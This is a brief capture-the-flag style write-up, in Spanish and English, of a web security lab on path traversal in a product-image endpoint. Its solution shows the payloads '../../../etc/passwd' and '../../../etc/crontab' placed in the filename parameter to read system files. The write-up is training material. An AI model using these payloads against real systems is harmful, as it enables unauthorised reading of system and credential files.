01 Lab: File path traversal, simple case

Objetivo

This lab contains a path traversal vulnerability in the display of product images.

To solve the lab, retrieve the contents of the /etc/passwd file.

Solución

  1. Verificamos la aplicación y el funcionamiento.

https://0a8d007b04dee1ae81b14d89002500e0.web-security-academy.net/image?filename=36.jpg

image.png

  1. Modificamos el parámetro filename en las consultas usando el siguiente payload.

../../../etc/crontab
image.png
../../../etc/passwd
image.png
Previous12 Path traversalNext13 Access Control Vulnerability

Last updated